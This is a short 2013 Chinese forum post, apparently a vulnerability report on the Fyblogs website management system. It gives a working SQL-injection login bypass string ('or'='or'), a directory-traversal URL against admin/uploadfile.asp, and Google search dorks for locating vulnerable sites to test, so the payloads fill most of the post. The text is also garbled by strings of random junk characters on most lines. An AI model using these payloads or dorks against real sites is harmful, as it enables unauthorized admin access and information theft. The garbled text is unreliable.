漏洞类型: 未授权访问/权限绕过; p B. m* i' [& B# c' b
% A7 h* R( x5 Q5 }( M2 D
简要描述:% A5 K0 v# h# M0 V
9 y) m* o4 w6 K/ r
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
' d) m+ @+ O7 E* B5 @# K0 _7 P1 Q
1 p$ \3 m# m8 f c& o- _详细说明:
$ N: `- g# H! I7 Z: _: l1 k, W* @
: H" T! a- n/ I, f0 W/ X' O后台万能密码 'or'='or'
3 |4 ]! o5 Q8 N- }+ h4 Y后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
- ]& g+ k; U- L; N# N* vadmin/uploadfile.asp?currentFolder=/upfiles/../' g! K# H$ u' ]( T! _5 G- V
. M' `3 o x& R: i7 |$ P7 K
漏洞证明:( H5 Z) F+ ~' u$ i9 s
$ e; f; W; `$ j1 ?0 G8 l) B6 X3 l谷歌:inurl:type.asp?id=1 新闻中心( O4 O. e0 q3 W$ q0 r
或者 :inurl:download_ok.asp?
- D ~3 I) l( _2 T7 ~2 S
& G1 J, c# _, V/ t, C' B7 n ~' Y可以测试
/ u$ E0 f" K$ Z; z: h% `5 K$ p; s$ ^! D1 ~7 ]4 L! N0 `
- l# P! o# ]8 [5 B9 {, } |
发表于 2013-3-7 13:07:46
收藏
支持
反对